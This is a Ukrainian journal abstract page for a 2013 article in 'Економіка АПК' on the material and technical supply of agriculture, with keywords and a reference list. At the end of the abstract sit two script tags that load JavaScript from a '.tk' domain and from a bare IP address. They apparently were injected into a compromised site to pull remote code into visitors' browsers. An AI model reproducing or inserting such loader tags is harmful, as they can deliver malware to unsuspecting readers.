ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 65.012.34:338.431
Матеріально-технічне забезпечення аграрної сфери

Матеріально-технічне забезпечення аграрної галузі / Могилова М.М., Білоусько Я. К., Підлісецький Г. М. // Економіка АПК. - 2013. - № 2 - С. 61

Проведено системний аналіз проблеми матеріально-технічного забезпечення сільського господар­ства: тенденції, причини, фактори, негативні наслідки. Розроблено для запровадження в практику не­обхідні заходи з метою підвищення рівня фондооснащеності аграрного виробництва, а саме забезпе­чення достатнього рівня інвестування в основний капітал аграрного виробництва; удосконалення форм державної підтримки техніко-технологічного оснащення галузі; реформування амортизаційної системи в інвестиційному напрямі; забезпечення систематичної переоцінки основних засобів сільсь­кого господарства; проведення структурної перебудови вітчизняного машинобудування для агропро­мислового комплексу; запровадження системи та механізму ліцензійного виробництва сільськогос­подарських машин іноземних фірм на території України. Табл.: 8. Рис.: 2. Бібліогр.: 4.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: матеріально-технічна база, основні засоби, техніко-технологічне забезпечення, фондооснащеність

Список використаних джерел

  1. Білоусько Я.К. Тенденції і перспективи техніко-технологічного переоснащення сільського господарства / Я.К. Білоусько, В.Л. Товстопят // - Агроінком. - 2011. - №7-9. - С. 132.
  2. Олійник О.В. Державна підтримка матеріально-технічного забезпечення аграрних підприємств / О. В. Олійник, Т.В. Калашнікова // Економіка АПК. - 2012. - №7. - С. 95-100.
  3. Павловська Л.Д. Системний підхід до формування та використання виробничого потенціалу сільськогосподарських підприємств / Л.Д. Павловська, Н.К. Мрачковська // Економіка АПК. - 2012. - №6. - С. 74-80.
  4. Петриков О. Здаєш стару машину - отримуєш дисконт на нову / О. Петриков // Уряд. кур’єр. - 2011. - №3.
Читати статтю: 13_02_10.pdf